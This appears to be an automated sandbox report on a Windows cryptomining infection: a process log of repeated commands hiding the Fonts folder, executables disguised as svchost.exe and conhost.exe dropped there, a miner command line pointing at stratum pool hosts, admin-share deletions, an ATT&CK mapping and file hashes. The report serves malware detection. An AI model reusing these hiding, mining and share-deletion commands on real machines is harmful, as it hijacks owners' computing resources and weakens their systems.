C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4436

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2600

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2760

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1136

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4988

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4752

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:820

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2820

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1904

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4208

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3516

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4304

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3704

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2212

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2676

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:300

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2708

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:412

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4352

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1524

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4268

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2944

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4372

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:748

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:784

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1632

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1788

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3176

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3500

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1336

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4200

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1448

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1640

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4908

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2724

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4540

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3992

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3312

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2008

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2264

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3968

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4048

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3956

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4588

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2872

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4312

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1188

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2864

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1552

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1932

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2796

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2360

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3768

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1196

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1828

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1264

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1272

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3868

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4976

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4304

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3736

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2700

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5000

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5044

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2128

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:412

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4936

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1524

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4180

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2944

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1892

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1140

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4204

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1788

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1380

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2092

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4580

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4460

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4536

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2300

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2240

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:304

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3928

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4860

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3368

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3312

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3320

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2264

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5060

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2528

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:8

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2596

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3192

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1880

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2556

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1588

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1644

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3652

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4676

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4244

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1268

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3208

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3404

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3728

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3300

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3152

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4932

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4976

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1396

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2512

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3224

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5000

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2708

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5036

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2128

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1144

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4936

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3724

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2056

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1872

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2428

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:784

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2072

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2268

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:64

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1772

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2016

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1632

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4768

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4916

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1848

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5012

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4020

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4572

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3148

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2348

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3204

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:608

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4336

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3544

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4328

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4860

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2136

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1388

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2520

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3132

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4516

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5084

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2896

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1720

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3660

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3956

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3196

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:604

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1628

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4436

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1552

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1932

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3884

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2680

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3208

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4752

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3728

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2820

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3152

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3756

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1128

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4304

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2212

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3964

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4308

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2304

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3524

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3944

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3744

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1192

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4296

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2944

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:616

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4392

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1140

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:716

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1072

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4120

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4272

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1576

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2324

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4356

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4584

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4196

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4548

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2408

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2348

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1340

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1496

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3400

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4636

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4540

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3368

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4980

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:388

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1744

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2520

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2368

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4516

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4224

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2528

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1720

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3192

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3536

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1860

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3408

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:1936

\??\c:\windows\Fonts\rundlls.exe
"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
2⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3076

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share c$ /delete
1⤵
PID:1040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share f$ /delete
1⤵
PID:4300

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

Modify Registry

T1112

Hidden Files and Directories

T1158

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize
215B

MD5
535a478cc80a0fbbf990eed73f8788bb

SHA1
459479dadaf00f3fa0de78f640c34dd426fd61aa

SHA256
323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51

SHA512
3c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1

Download Submit
C:\Windows\Fonts\conhost.exe
Filesize
2.9MB

MD5
1b9583c6c3eab1da961aec9e42bfbcb8

SHA1
c60f85fa6bcc463b3d38b7714916b241f2139650

SHA256
6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380

SHA512
0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

Download Submit
C:\Windows\Fonts\rundlls.exe
Filesize
5.2MB

MD5
ed499b3a95e11ecf57e5131cd82c2a14

SHA1
7f37e85068457497f5f34e73edde4963694cfc19

SHA256
c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5

SHA512
f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
